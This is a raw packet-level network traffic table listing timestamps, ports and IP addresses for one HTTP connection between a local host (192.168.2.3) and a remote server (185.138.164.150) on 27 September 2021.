Sep 27, 2021 23:55:30.532180071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.532404900 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.534712076 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.534735918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.534828901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.534878969 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.535010099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.535043001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.535065889 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.567688942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.567765951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.567781925 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.567799091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.567846060 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.567848921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.567879915 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.567914009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.567922115 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.569960117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.569984913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.570063114 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.570166111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.570200920 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.570225000 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.603322983 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.603357077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.603425980 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.603434086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.603513002 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.603626013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.603656054 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.603688002 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.603724003 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.605434895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.605459929 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.605472088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.605571985 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.605598927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.605684042 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.638901949 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.638926029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.638942957 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.639003038 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.639036894 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.639107943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.639168024 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.639353037 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.639373064 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.639417887 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.642483950 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.642527103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.642718077 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.674488068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.674515963 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.674531937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.674545050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.674699068 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.674787045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.674804926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.674877882 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.677606106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.677691936 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.709939003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.709963083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.710017920 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.710191011 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.710324049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.710648060 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.710952997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.711180925 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.711252928 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.711440086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.711848974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.711967945 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.713255882 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.745455027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.745479107 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.745666981 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.745831966 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.745851040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.745959044 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.746241093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.746325016 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.746613026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.747387886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.747414112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.747479916 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.780257940 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.780325890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.780338049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.780450106 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.780479908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.780616045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.780776024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.780786037 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.780853033 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.782270908 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.782296896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.782397985 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.815310001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.815341949 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.815355062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.815366983 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.815536976 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.815761089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.815843105 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.816143990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.817872047 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.817902088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.817918062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.817985058 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.818023920 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.851457119 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.851484060 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.851496935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.851510048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.851528883 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.851547956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.851675987 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.851726055 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.852854967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.852875948 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.852890015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.852902889 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.853108883 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.888308048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888333082 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888354063 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888366938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888380051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888391972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888492107 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888514042 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888526917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888545990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.888550997 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.888602018 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.888631105 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.926004887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926043987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926063061 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926080942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926098108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926115036 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926130056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926146984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926162958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926182032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926199913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926215887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.926239014 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.926306963 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.963314056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.963342905 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.963709116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.963727951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.963742018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.963749886 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.963759899 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.963939905 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.964137077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.964154005 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.964221001 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.964224100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.964590073 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.964608908 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.964621067 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.964715004 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:30.999799967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.999836922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.999850035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.999861956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:30.999876976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.000019073 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.000021935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.000091076 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.000185013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.000340939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.000395060 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.000543118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.000622988 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.000663042 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.000669003 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.000685930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.000726938 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.035300016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035334110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035351038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035372972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035388947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035404921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035459995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035480976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035496950 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.035516977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035537958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035551071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035597086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.035624027 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.035664082 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.035737038 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.071805954 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.071839094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.071856022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.071871996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.071888924 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.071904898 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.071921110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.071995974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.072017908 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.072016954 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.072056055 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.072056055 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.072165966 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.072202921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.072227001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.072246075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.072249889 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.072283983 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.072324038 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.106575966 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.106607914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.106625080 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.106645107 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.106725931 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.106731892 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.106745005 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.106762886 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.106779099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.106807947 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.106990099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.107018948 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.107045889 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.107052088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.107069969 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.107098103 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.107110023 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.107144117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.107156038 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.107163906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.107203960 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.142062902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142093897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142115116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142158985 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142182112 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.142220020 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.142266989 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142358065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142386913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142412901 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.142477036 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142575979 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.142596960 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142613888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142630100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142648935 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.142673016 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.142674923 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142704964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.142720938 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.142755985 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.177412987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177438021 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177452087 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177468061 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177483082 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177495003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177514076 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177547932 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177562952 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177584887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177591085 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.177612066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.177709103 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.177755117 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.177802086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.212012053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.212423086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.212441921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.212491035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.212507963 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.212567091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.212584019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.212610006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.212805986 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.212848902 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.212878942 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.247629881 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.247659922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.247677088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.247790098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.247803926 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.247821093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.247869968 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.247870922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.247888088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.247904062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.247941971 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.282824993 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.282885075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.282910109 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.282931089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.282951117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.282972097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.282991886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.283018112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.283102989 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.283155918 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.318628073 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.318694115 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.318717957 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.318782091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.318806887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.318837881 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.318885088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.318900108 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.318908930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.318933964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.318943977 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.318955898 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.318979025 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.319014072 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.319084883 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.353682995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.353720903 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.353744984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.353765965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.353789091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.353832006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.353852034 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.353899956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.353923082 CEST	49745	80	192.168.2.3	185.138.164.150
